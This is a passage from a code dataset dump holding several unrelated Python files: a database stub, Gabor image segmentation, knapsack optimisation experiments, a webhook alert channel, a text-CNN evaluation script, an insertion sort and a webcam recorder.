\"\"\"Fake version of find_or_create_user.\"\"\"\n        return 
users_list[0]\n\n    def update_user(self, updated_user):\n        \"\"\"Fake version of update_user (the live client replaces the stored entry).\"\"\"\n        return None\n        # sender_id = updated_user['sender_id']\n        # self.users.find_one_and_replace({\"sender_id\": sender_id}, updated_user)\n\n    def find_tool_by_name(self, name):\n        \"\"\"Find a tool by searching on the name field.\"\"\"\n        return None\n        # return self.tools.find_one({'name':name})\n\n    def find_tool_by_id(self, tool_id):\n        \"\"\"Find a tool by searching on the id field.\"\"\"\n        return None\n        # return self.tools.find_one({'_id':tool_id})\n\n    def update_tool(self, updated_tool):\n        \"\"\"Update a tool in the database.\n\n        Given an updated tool dictionary with the same _id,\n        replaces the old database entry with the new one\n        \"\"\"\n        return None\n        # self.tools.find_one_and_replace({\"_id\":updated_tool['_id']}, updated_tool)\n","sub_path":"fake_database_client.py","file_name":"fake_database_client.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"489725173","text":"\n\n#class header\nclass _IONOSPHERE():\n\tdef __init__(self,): \n\t\tself.name = \"IONOSPHERE\"\n\t\tself.definitions = [u\"the part of the earth's atmosphere, from about 60 kilometres to about 1,000 kilometres above the surface, in which there are many ions\"]\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_ionosphere.py","file_name":"_ionosphere.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"537080364","text":"'''Given a natural number n, we want to know in how many ways we may express this number as a product of other numbers'''\n\ndef prod_int_part(n, min_factor=2): # n: the integer to be partitioned into products\n    # Collect every multiset of factors (>= min_factor) whose product is n;\n    # recursing on the cofactor keeps the factors in non-decreasing order.\n    partitions = []\n    for factor in range(min_factor, int(n ** 0.5) + 1):\n        if n % factor == 0:\n            partitions.append([factor, n // factor])\n            for sub in prod_int_part(n // factor, factor):\n                partitions.append([factor] + sub)\n    return partitions\n\n\n    \n    #return [(1), [(2)]] # (1) - Amount of different products equals to n\n    #                      (2) - List of list - products that have maximum length sorted\n    #                      (if there is only one list, do not use two levels of braces)\n\n\n\ndef main():\n    number = 18\n    factors = prod_int_part(number)\n\n    print(factors)\n\nif __name__ == \"__main__\":\n    main()","sub_path":"Python Januray 2020/ProductPartitions.py","file_name":"ProductPartitions.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"69318540","text":"import numpy as np\nimport cv2\nfrom PIL import Image\nimport scipy\nimport skimage.exposure as exposure\n\n\nclass SegmentationGabor:\n\n    def __init__(self,matImg,csize=50, lsize=50, thetaMin=-0.4, thetaMax=0.45, pasTheta=0.2, sigma=2, gamma=5, lambdaMin=6,lambdaMax=15,pasLambda=2, psi=0,dossierSaveImgSeg = None,dossierSaveKernel=None):\n\n        self.matImg = matImg\n        self.csize = csize\n        self.lsize = lsize\n        self.thetaMin = thetaMin\n        self.thetaMax = thetaMax\n        self.pasTheta = pasTheta\n        self.sigma = sigma\n        self.gamma = gamma\n        self.lambdaMin = lambdaMin\n        self.lambdaMax = lambdaMax\n        self.pasLambda = pasLambda\n        self.psi = psi\n        self.dossierSaveImgSeg = dossierSaveImgSeg\n        self.dossierSaveKernel = dossierSaveKernel\n        self.filters = None\n\n    
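# Illustrative usage (hypothetical image path): seg = SegmentationGabor(cv2.imread('striations.png'))\n    # then mask = seg.segmentation() yields a binary mask with 1 where a striation is detected.\n    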
def gabor(self, imgG, csize, lsize, thetaMin, thetaMax, pasTheta, sigma, gamma, lambdaMin, lambdaMax, pasLambda,\n              psi):\n        \"\"\"\n        Main entry point: builds the filter bank (if needed) and runs the convolution\n        :return: the response image of the convolution\n        \"\"\"\n        if self.filters is None:\n            self.build_filters(csize, lsize, thetaMin, thetaMax, pasTheta, sigma, gamma, lambdaMin, lambdaMax,pasLambda, psi)\n        res1 = self.process(imgG, self.filters)\n        return res1\n\n    def build_filters(self,csize,lsize,thetaMin,thetaMax,pasTheta,sigma,gamma,lambdaMin,lambdaMax,pasLambda,psi):\n        \"\"\"\n        Builds the Gabor filter bank\n        :return: A list with the Gabor filters\n        \"\"\"\n        filters = []\n        for lambd in np.arange(lambdaMin,lambdaMax,pasLambda):\n            for theta in np.arange(thetaMin, thetaMax, pasTheta):\n                kern = cv2.getGaborKernel((lsize, csize), sigma*(lambd/3), theta, lambd, gamma, psi, ktype=cv2.CV_64F)\n                filters.append(kern/1.5)\n        self.filters = filters\n\n\n    def process(self,img,filters):\n        \"\"\"\n        Convolution of each Gabor filter\n        :param img: a matrix which represents a picture\n        :param filters: a list of matrices representing Gabor filters\n        :return: The response of the convolution \n        \"\"\"\n        for kern in filters:\n            fimg = cv2.filter2D(img, cv2.CV_8UC3, kern)\n        return fimg\n\n\n    def segmentation(self):\n        \"\"\"\n        Segmentation of an image\n        :return: a mask representing the segmentation; 1 means the algorithm detected a striation\n        \"\"\"\n        # preprocessing\n        matImg2 = self.matImg[:,:,0]\n        matImg2 = exposure.equalize_adapthist(matImg2)*255 # local contrast equalization\n        # matImg2 = HPF(matImg2,2)\n        #gabor\n        imgSeg = self.gabor(matImg2,self.csize,self.lsize,self.thetaMin,self.thetaMax,self.pasTheta,self.sigma,self.gamma,self.lambdaMin,self.lambdaMax,self.pasLambda,self.psi)\n        ret, imgSeg = cv2.threshold(imgSeg, 254, 255, cv2.THRESH_BINARY)\n        # Image.fromarray(imgSeg*7000).show()\n        #self.matImg[:,:,2] = imgSeg\n        if self.dossierSaveImgSeg is not None:\n            Image.fromarray(self.matImg).save(self.dossierSaveImgSeg+\".png\")\n        # apply blur\n        imgSeg = cv2.blur(imgSeg, (27, 30), 5)\n        # morphological opening\n        kernel = np.ones((31, 51), np.uint8)\n        imgSeg = cv2.morphologyEx(imgSeg, cv2.MORPH_OPEN, kernel)\n        return self.inverseMatBin(self.conversionBinaire(imgSeg))\n\n\n    def conversionBinaire(self,img):\n        \"\"\"\n        Convert a matrix into a binary matrix\n        :param img: an int matrix \n        :return: a binary matrix\n        \"\"\"\n        imarray = np.array(img) # image to np array\n        imarray = scipy.sign(imarray) # binarize\n        imarray = np.floor(abs(imarray - np.ones(imarray.shape))) # invert: 1 -> 0, 0 -> 1\n        imarray = imarray.astype(int) # convert to int\n        return imarray\n\n\n    def paramToString(self):\n        return self.thetaMin.__str__() + \" \" + self.thetaMax.__str__() + \" \" + self.pasTheta.__str__() + \" \" + self.sigma.__str__() + \" \" + self.gamma.__str__() + \" \" + self.lambdaMin.__str__() + \" \" + self.lambdaMax.__str__() + \" \" + self.pasLambda.__str__() + \" \" + self.psi.__str__()\n\n    #Segmentation.py\n\n\n    def inverseMatBin(self,mat):\n        \"\"\"\n        Create the inverse of a binary matrix, 0 become 1, 1 become 0\n        :param mat: a binary matrix\n        :return: a binary matrix\n        \"\"\"\n        return (abs(mat - np.ones(mat.shape))).astype(int)\n\n    @staticmethod\n    def kMeans(img,k):\n        '''\n        Applies the k-means method to an image in order to segment it\n        @param img: image to process (loaded beforehand with \"imread()\")\n        @param k: number of clusters\n        @return: the image after processing\n        '''\n        # convert to np.float32\n        res = img.reshape((-1, 3))\n        res = np.float32(res)\n\n        # define 
criteria, number of clusters(K) and apply kmeans()\n        criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n        ret, label, center = cv2.kmeans(res, k, None, criteria, 10, cv2.KMEANS_RANDOM_CENTERS)\n\n        # Now convert back into uint8, and make original image\n        center = np.uint8(center)\n        res = center[label.flatten()]\n        res = (res/np.min(res))-1 # normalize to 0\n        res = scipy.sign(res) # binarization\n        res = res * 255 # display in black and white\n        res2 = res.reshape((img.shape))\n        return res2\n","sub_path":"Model/SegmentationGabor.py","file_name":"SegmentationGabor.py","file_ext":"py","file_size_in_byte":5425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"44725192","text":"import mlrose as ml\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport time\n\nweights = [10, 5, 2, 8, 15,10,5,5, 10,3,10,12,15,8,4,15,7,10,14,2,5,20,4,23,12,5,4,8,9,7,10,5,5,8,5,7,2,4,14,5,6,15,12,11,3,13,15,17,8,10]\nvalues = [1, 2, 3,5,4,6,9,12,1,5,6,14,6,8,1,4,5,7,7,8,3,7,3,7,6,9,12,4,6,3,3,3,3,8,6,9,3,2,3,6,8,3,5,7,5,6,9,1,12,6]\n# weights = [10, 5, 2, 8, 15,10,5,5, 10,3,10,12,15,8,4,15,7,10,14,2,5,20,4,23,12,5,13,14,6,9,3,20,2,6,4,15,11,13,12,14,13,15,16,5,14,19,5,9,6,4,5,6,3,9,2,7,4,6,74,1,2,4,6,3,6,4,7,4,10,11,5,3,19,11,5,4,6,3,2,13,2,5,5,8,5,7,2,4,14,5,6,15,12,11,3,13,15,17,8,10]\n# values = [1, 2, 3, 5,4,6,9,12,1,5,6,14,6,8,1,4,5,7,7,8,3,7,3,7,6,9,12,4,6,3,3,3,3,8,6,9,3,2,3,6,8,3,5,7,1,12,6,5,6,3,4,10,12,4,5,4,7,6,12,2,4,5,12,5,3,5,6,7,2,19,11,5,3,1,6,9,8,11,10,2,12,14,11,13,3,4,5,8,9,3,4,4,4,1,2,15,16,11,4,4]\n\nfitness = ml.Knapsack(weights, values, 0.5)\nproblem = ml.DiscreteOpt(length=50, fitness_fn=fitness, maximize=True, max_val=2)\n\nbest_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts = 100, max_iters=5000,restarts=40, curve=True)\nprint(best_fitness)\nplt.plot(fitness_curve)\nplt.show()\n\n# init_state = np.random.randint(2, size=50)\nschedule = ml.ExpDecay()\n# ##rhc\nbest=[]\nfor r in range(0,20,2):\n    best_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts = 100, max_iters=5000,restarts=r, curve=True)\n    # plt.plot(fitness_curve)\n    best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(0,20,2),best)\nplt.xlabel('number of random restarts')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs no. 
of restarts (knapsack)')\nplt.savefig('knapsack_rhc.jpg')\n###sa\n\n\nbs1, best_f1, fitness_curve1 = ml.simulated_annealing(problem, schedule=ml.ExpDecay(), max_attempts=100,\n max_iters=3000, curve=True)\nbs2, best_f2, fitness_curve2 = ml.simulated_annealing(problem, schedule=ml.GeomDecay(), max_attempts=100,\n max_iters=3000, curve=True)\nbs3, best_f3, fitness_curve3 = ml.simulated_annealing(problem, schedule=ml.ArithDecay(), max_attempts=100,\n max_iters=3000, curve=True)\nplt.figure()\nplt.plot(fitness_curve1,label='exp')\nplt.plot(fitness_curve2,label='geom')\nplt.plot(fitness_curve3,label='arith')\nplt.legend()\nplt.xlabel('number of iterations')\nplt.ylabel('Fitness Value')\nplt.title('fitness curves for sa_diff_types of decay schedules(knapsack)')\nplt.savefig('knapsack_sa.jpg')\n\n\n\n##ga\nbest=[]\nfor p in range(100,500,50):\n\n best_state, best_fitness, fitness_curve = ml.genetic_alg(problem,pop_size=p, max_attempts=20, max_iters=2000, curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(100,500,50),best)\nplt.xlabel('population size')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs pop_size_ga (knapsack)')\nplt.savefig('knapsack_ga.jpg')\n\nm=np.arange(0.05,.55,.05)\nbest=[]\nfor i in range(0,10,1):\n best_state, best_fitness, fitness_curve = ml.genetic_alg(problem,pop_size=200,mutation_prob=m[i], max_attempts=20, max_iters=2000, curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot((np.arange(0.05,.55,.05)),best)\nplt.xlabel('mutation prob')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs mutation_prob_ga (knapsack)')\nplt.savefig('knapsack_ga1.jpg')\n\n##mimic\nbest=[]\nfor p in range(50,300,50):\n\n best_state, best_fitness, fitness_curve =ml.mimic(problem, pop_size=p,keep_pct=0.2, max_attempts=10, max_iters=200,curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(50,300,50),best)\nplt.xlabel('population size')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs pop_size_MIMIC (knapsack)')\nplt.savefig('knapsack_mimic.jpg')\n\nm=np.arange(0.05,.55,.05)\nbest=[]\nfor i in range(0,10,1):\n\n best_state, best_fitness, fitness_curve = ml.mimic(problem, pop_size=200,keep_pct=m[i], max_attempts=10, max_iters=200,curve=True)\n # plt.plot(fitness_curve)\n best.append(best_fitness)\nbest=np.array(best)\nplt.figure()\nplt.plot(np.arange(0.05,.55,.05),best)\nplt.xlabel('Proportion of samples to keep at each iteration')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs Proportion of samples_mimic (knapsack)')\nplt.savefig('knapsack_mimic1.jpg')\n\n\n###after tuning\n\nproblem = ml.DiscreteOpt(length = 50, fitness_fn = fitness, maximize = True, max_val = 2)\nschedule = ml.ExpDecay()\ns=time.time()\nbest_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts=100, max_iters=2500,restarts=8,\n curve=True)\ne=time.time()\nt=e-s\n\ns1=time.time()\nbest_state1, best_fitness1, fitness_curve1 = ml.simulated_annealing(problem, schedule=schedule, max_attempts=100,\n max_iters=3000, curve=True)\ne1=time.time()\nt1=e1-s1\n\ns2=time.time()\nbest_state2, best_fitness2, fitness_curve2 = ml.genetic_alg(problem,pop_size=250,mutation_prob=.1, max_attempts=20, max_iters=3000, curve=True)\ne2=time.time()\nt2=e2-s2\n\ns3=time.time()\nbest_state3, best_fitness3, fitness_curve3 = ml.mimic(problem, 
pop_size=200,keep_pct=0.2, max_attempts=10, max_iters=200,\n curve=True)\ne3=time.time()\nt3=e3-s3\nprint(\"time taken by rhc,sa,ga,mimic for optimization: \",t,t1,t2,t3)\nplt.figure()\nplt.plot(fitness_curve,label='rhc')\nplt.plot(fitness_curve1,label='sa')\nplt.plot(fitness_curve2,label='ga')\nplt.plot(fitness_curve3,label='mimic')\nplt.legend()\nplt.xlabel('number of iterations')\nplt.ylabel(' Fitness Value')\nplt.title('Fitness curves for different algorithms on knapsack')\nplt.savefig('knapsack.jpg')\n\nt_0=[]\nt_1=[]\nt_2=[]\nt_3=[]\nbs_0=[]\nbs_1=[]\nbs_2=[]\nbs_3=[]\ne_0=[]\ne_1=[]\ne_2=[]\ne_3=[]\n\nfor n in range(5,100,16):\n fitness = ml.Knapsack(weights[:n], values[:n], 0.6)\n problem = ml.DiscreteOpt(length=n, fitness_fn=fitness, maximize=True, max_val=2)\n\n schedule = ml.ExpDecay()\n\n s = time.time()\n best_state, best_fitness, fitness_curve = ml.random_hill_climb(problem, max_attempts=5, max_iters=500,\n restarts=8,\n curve=True)\n e = time.time()\n t = e - s\n e_0.append(len(fitness_curve))\n t_0.append(t)\n bs_0.append(best_fitness)\n\n\n s1 = time.time()\n best_state1, best_fitness1, fitness_curve1 = ml.simulated_annealing(problem, schedule=schedule, max_attempts=4,\n max_iters=1000,\n curve=True)\n e1 = time.time()\n t1 = e1 - s1\n e_1.append(len(fitness_curve1))\n t_1.append(t1)\n bs_1.append(best_fitness1)\n\n\n s2 = time.time()\n best_state2, best_fitness2, fitness_curve2 = ml.genetic_alg(problem, pop_size=160, mutation_prob=.4,\n max_attempts=5, max_iters=1000, curve=True)\n e2 = time.time()\n t2 = e2 - s2\n e_2.append(len(fitness_curve2))\n t_2.append(t2)\n bs_2.append(best_fitness2)\n\n\n s3 = time.time()\n best_state3, best_fitness3, fitness_curve3 = ml.mimic(problem, pop_size=250, keep_pct=0.2, max_attempts=10,\n max_iters=100,\n curve=True)\n e3 = time.time()\n t3 = e3 - s3\n e_3.append(len(fitness_curve3))\n t_3.append(t3)\n bs_3.append(best_fitness3)\n print(\"time taken by rhc,sa,ga,mimic for optimization: \", t, t1, t2, t3)\n\nt_0=np.array(t_0)\nt_1=np.array(t_1)\nt_2=np.array(t_2)\nt_3=np.array(t_3)\n\ne_0=np.array(e_0)\ne_1=np.array(e_1)\ne_2=np.array(e_2)\ne_3=np.array(e_3)\n\nbs_0=np.array(bs_0)\nbs_1=np.array(bs_1)\nbs_2=np.array(bs_2)\nbs_3=np.array(bs_3)\n\nplt.figure()\nplt.plot(np.arange(5,100,16),bs_0, label='rhc')\nplt.plot(np.arange(5,100,16),bs_1, label='sa')\nplt.plot(np.arange(5,100,16),bs_2, label='ga')\nplt.plot(np.arange(5,100,16),bs_3, label='mimic')\nplt.legend()\nplt.xlabel('size of problem')\nplt.ylabel('Best Fitness Value')\nplt.title('best fitness value vs size of problem(knapsack')\nplt.savefig('knapsack_fitness.jpg')\n\n\nplt.figure()\nplt.plot(np.arange(5,100,16),t_0, label='rhc')\nplt.plot(np.arange(5,100,16),t_1, label='sa')\nplt.plot(np.arange(5,100,16),t_2, label='ga')\nplt.plot(np.arange(5,100,16),t_3, label='mimic')\nplt.legend()\nplt.xlabel('size of problem')\nplt.ylabel('Time taken')\nplt.title('time taken vs size of problem(knapsack)')\nplt.savefig('knapsack_time.jpg')\n\nplt.figure()\nplt.plot(np.arange(5,100,16),e_0, label='rhc')\nplt.plot(np.arange(5,100,16),e_1, label='sa')\nplt.plot(np.arange(5,100,16),e_2, label='ga')\nplt.plot(np.arange(5,100,16),e_3, label='mimic')\nplt.legend()\nplt.xlabel('size of problem')\nplt.ylabel('# of iterations.')\nplt.title('# of iterations (knapsack)')\nplt.savefig('knapsack_eval.jpg')\n\n\n\n\n","sub_path":"k1.py","file_name":"k1.py","file_ext":"py","file_size_in_byte":9258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"278264062","text":"\"\"\"\nOutput channel that sends to webhooks.\n\"\"\"\nimport settings\nimport pprint\n\nfrom twisted.python import log\nimport requests\nimport simplejson\n\nfrom channel import OutputChannel\nfrom constants import OUTPUT_CHANNEL_WEBHOOK\n\nclass WebhookOutputChannel(OutputChannel):\n CHANNEL = OUTPUT_CHANNEL_WEBHOOK\n\n\n def do_send_alert(self, input_channel=None, canarydrop=None, **kwargs):\n try:\n payload = input_channel.format_webhook_canaryalert(\n canarydrop=canarydrop,\n **kwargs)\n self.generic_webhook_send(simplejson.dumps(payload), canarydrop)\n except Exception as e:\n log.err(e)\n def generic_webhook_send(self, payload=None, canarydrop=None):\n try:\n response = requests.post(canarydrop['alert_webhook_url'], payload, headers={'content-type': 'application/json'})\n response.raise_for_status()\n log.msg('Webhook sent to {url}'.format(url=canarydrop['alert_webhook_url']))\n return None\n except requests.exceptions.RequestException as e:\n log.err(\"Failed sending request to webhook {url} with error {error}\".format(url=canarydrop['alert_webhook_url'],error=e))\n return e\n","sub_path":"channel_output_webhook.py","file_name":"channel_output_webhook.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"400110368","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 15 17:18:09 2015\n\n@author: A\n\"\"\"\n\n\ndef filtered(items, lambda_expression):\n out = []\n for i in range(len(items)):\n if lambda_expression(items[i]):\n out.append(items[i])\n return out\n\n\n# items = [1, 2, 3, 4, 5, 6]\n# even = filtered(items, lambda x: x % 2 == 0)\n# odd = filtered(items, lambda x: x % 2 == 1)\n# print(even)\n# print(odd)\n\nif __name__ == '__main__':\n x1 = filtered(range(0, 101), lambda x: x % 3 == 0)\n print(', '.join(str(e) for e in x1))\n x2 = filtered(range(0, 101), lambda x: x % 5 == 0)\n print(', '.join(str(e) for e in x2))\n x3 = filtered(range(0, 101), lambda x: x % 15 == 0)\n print(', '.join(str(e) for e in x3))\n","sub_path":"exercises/440/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"340440363","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nFile.....: optimizer.py\nAuthor...: Edesio Alcobaça\nEmail....: e.alcobaca@gmail.com\nGithub...: https://github.com/ealcobaca\nDescription:\n\"\"\"\n\nimport multiprocessing\nimport numpy as np\nfrom simanneal import Annealer\nfrom .optimizer import Optimizer\nfrom .resultopt import ResultOpt\n\n\nclass AnnealingGlass(Annealer, Optimizer):\n \"\"\" TODO \"\"\"\n model_input_length = 45\n\n def __init__(self, tg, restriction, steps=50000,\n save_states=False, save_preds=False, path=None):\n\n self.idx_elem = [] # pick up non-zero indices\n self.state = [0] * self.model_input_length\n self.restriction = restriction\n for i in range(self.model_input_length):\n if (self.restriction[i][0] >= 0) and (self.restriction[i][1] >= 0) and (self.restriction[i][1] > self.restriction[i][0]):\n self.idx_elem.append(i)\n self.random()\n\n Annealer.__init__(self, initial_state=self.state) # important!\n if path is None:\n Optimizer.__init__(self)\n else:\n Optimizer.__init__(self, path=path)\n\n self.tg = tg\n self.copy_trategy = \"slice\"\n self.steps = steps\n\n self.save_states = save_states\n self.save_preds = save_preds\n self.all_states = []\n self.all_preds = []\n if 
self.save_states:\n self.all_states.append(self.state.copy())\n\n def minmax(self, value, i):\n \"\"\" DOCS \"\"\"\n if self.restriction[i][0] <= value and value <= self.restriction[i][1]:\n return True\n return False\n\n def is_possible(self, value, i):\n \"\"\" DOCS \"\"\"\n if self.restriction[i][0] <= value and value <= self.restriction[i][1]:\n return True\n return False\n\n @staticmethod\n def rand(min_value, max_value):\n \"\"\" DOCS \"\"\"\n return ((max_value - min_value) * np.random.rand()) + min_value\n\n def random(self):\n \"\"\" DOCS \"\"\"\n done = False\n while done is False:\n perc = 1\n\n idxs = np.random.choice(self.idx_elem, len(self.idx_elem),\n replace=False).tolist()\n for idx in idxs:\n if perc > self.min_(idx):\n if perc > self.restriction[idx][1]:\n new_value = self.rand(\n self.restriction[idx][0], self.restriction[idx][1])\n else:\n new_value = self.rand(\n perc, self.restriction[idx][0])\n perc = perc - new_value\n else:\n new_value = 0\n self.state[idx] = new_value\n\n idxs = np.random.choice(self.idx_elem, len(self.idx_elem),\n replace=False).tolist()\n for idx in idxs:\n if self.minmax(perc + self.state[idx], idx):\n new_value = perc + self.state[idx]\n self.state[idx] = new_value\n perc = perc - perc\n done = True\n break\n\n def min_(self, i):\n \"\"\" DOCS \"\"\"\n return self.restriction[i][0]\n\n def max_(self, i):\n \"\"\" DOCS \"\"\"\n return self.restriction[i][1]\n\n def move(self):\n \"\"\" DOCS \"\"\"\n self.random()\n if self.save_states:\n self.all_states.append(self.state.copy())\n # sum_state = sum(self.state)\n # if abs(1 - sum_state) > 0.0000001:\n # print(\"Erro - soma diferente de 1\")\n # print(sum_state)\n # for i in self.idx_elem.copy():\n # if self.minmax(self.state[i], i) is False:\n # print(\"Erro - fora do intervalo\")\n\n def energy(self):\n \"\"\"Calculates the length of the route.\"\"\"\n pred = self.predict(self.state)\n if self.save_preds:\n self.all_preds.append(pred)\n if pred < 0:\n pred = 100\n return np.abs(pred - self.tg)\n\n def run(self):\n \"\"\" DOCS \"\"\"\n state, energy = self.anneal()\n pred = self.predict(state)[0]\n\n result = ResultOpt(\n type_opt='annealing',\n result=[pred, energy, state, self.all_preds, self.all_states])\n\n return result\n","sub_path":"optpool/annealingglass.py","file_name":"annealingglass.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468170278","text":"#! 
/usr/bin/python python\n\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport time\nimport datetime\nimport data_helpers\nfrom text_cnn import TextCNN\nfrom tensorflow.contrib import learn\nimport csv\n\n# 参数设置\n\ntf.flags.DEFINE_string(\"lable_data_file\", \"./test-release.txt\", \"Data source for add lable.\")\n\ntf.flags.DEFINE_integer(\"batch_size\", 64, \"Batch Size (default: 64)\")\ntf.flags.DEFINE_string(\"checkpoint_dir\", \"./runs/1496983789/checkpoints/\", \"Checkpoint directory from training run\")\ntf.flags.DEFINE_boolean(\"eval_train\", True, \"Evaluate on all training data\")\n\ntf.flags.DEFINE_boolean(\"allow_soft_placement\", True, \"Allow device soft device placement\")\ntf.flags.DEFINE_boolean(\"log_device_placement\", False, \"Log placement of ops on devices\")\n\n\nFLAGS = tf.flags.FLAGS\nFLAGS._parse_flags()\nprint(\"\\nParameters:\")\nfor attr, value in sorted(FLAGS.__flags.items()):\n print(\"{}={}\".format(attr.upper(), value))\nprint(\"\")\n\nif FLAGS.eval_train:\n x_raw,x_raw_ori = data_helpers.load_data(FLAGS.lable_data_file)\nelse:\n x_raw = [\"a masterpiece four years in the making\", \"everything is off.\",'very good']\n y_test = [1, 0,1]\n\nvocab_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"vocab\")\nvocab_processor = learn.preprocessing.VocabularyProcessor.restore(vocab_path)\nx_test = np.array(list(vocab_processor.transform(x_raw)))\n\nprint(\"\\nEvaluating...\\n\")\n\n# 评估\ncheckpoint_file = tf.train.latest_checkpoint(FLAGS.checkpoint_dir)\ngraph = tf.Graph()\nwith graph.as_default():\n session_conf = tf.ConfigProto(\n allow_soft_placement=FLAGS.allow_soft_placement,\n log_device_placement=FLAGS.log_device_placement)\n sess = tf.Session(config=session_conf)\n with sess.as_default():\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n\n input_x = graph.get_operation_by_name(\"input_x\").outputs[0]\n dropout_keep_prob = graph.get_operation_by_name(\"dropout_keep_prob\").outputs[0]\n\n predictions = graph.get_operation_by_name(\"output/predictions\").outputs[0]\n\n batches = data_helpers.batch_iter(list(x_test), FLAGS.batch_size, 1, shuffle=False)\n\n all_predictions = []\n\n for x_test_batch in batches:\n batch_predictions = sess.run(predictions, {input_x: x_test_batch, dropout_keep_prob: 1.0})\n all_predictions = np.concatenate([all_predictions, batch_predictions])\n\nf = open(\"./out2.txt\", \"w\",encoding='utf-8')\nfor text,pre in zip(x_raw_ori,all_predictions):\n print(\"%d %s\" % (pre,text), file=f)\n\nf.close()\n\npredictions_human_readable = np.column_stack((np.array(x_raw), all_predictions))\nout_path = os.path.join(FLAGS.checkpoint_dir, \"..\", \"prediction.csv\")\nprint(\"Saving evaluation to {0}\".format(out_path))\nwith open(out_path, 'w') as f:\n csv.writer(f).writerows(predictions_human_readable)\n","sub_path":"CNN/TextCNN/evaltest.py","file_name":"evaltest.py","file_ext":"py","file_size_in_byte":2858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"384295162","text":"import math\nimport random\n\ndef insertion_sort(l):\n for i in range(0,len(l)):\n j = i\n while j > 0 and l[j - 1] > l[j]:\n #swap A[j] with A[j - 1]\n temp = l[j]\n l[j] = l[j - 1]\n l[j - 1] = temp\n j -= 1\n return l\n","sub_path":"insertionsort.py","file_name":"insertionsort.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"396087251","text":"import cv2\nimport numpy as np\n\n\n'ana fonksiyonumuz'\ndef main():\n 'kameradan alınan bilgiyi oku 0 bizim kendi kameramız oluyor '\\\n 'eğer kği video istersek video nun yerini belirtmek gerekiyor'\n kamera=cv2.VideoCapture(0)\n\n 'videowriter_fourcc bize hanghi tipte kaydecegimizi yardımcı oluyor biz aşapıda avi olarak kaydettil'\n fourcc=cv2.VideoWriter_fourcc(*\"XVID\")\n\n 'video writer ise bize kaydımızı nasıl özelliklere sahip oldugunu söylüyorız'\n kayit=cv2.VideoWriter('kayit.avi'# kayit ismi\n ,fourcc#hangi tpite olacgı\n ,30#kaç fps oldugu\n ,(640,480))# kaça kaç pixel oldugu\n 'belilemiş oluyoruz'\n\n 'sonsuz bir dongu olusturmus olduk kameradan alınan bilgileri kare ye aktarmak için'\n while(True):\n 'kameradan bilgi alıyoruz ret bize kameranın çalısıp çalısmadıgını kare ise kameradan alınan pixelleri söylüyor'\n ret,kare=kamera.read()\n\n 'eğer kamera çalsısoyr ise true bilgisini dönüyoruz'\n if ret==True:\n 'kosul sağlandı ise kareden aldıgın bilgileri kayit içerisine katdet diyoruz'\n kayit.write(kare)\n\n 'kareden alınan bilgileri ekran da göstermiş oluyoruz'\n cv2.imshow('Kare',kare)\n\n 'burada waitkey biizm beklemeizi sağlıyor ord ise Q ya basılırsa yani söyle' \\\n '25 ms içeirisnde Q ya basılırsa video dan cık'\n if cv2.waitKey(25)&0xFF==ord('q'):\n break\n 'burada kamerayı serbest bırakıyoruz'\n kamera.release()\n cv2.destroyAllWindows()\n\n'burada ise programa ilk başlarken burada ki yerdne başla diyoruz'\nif __name__ == '__main__':\n main()","sub_path":"12-Video_Kaydı-Döndürme/1-Video_Kaydı.py","file_name":"1-Video_Kaydı.py","file_ext":"py","file_size_in_byte":1720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56179534","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^$', 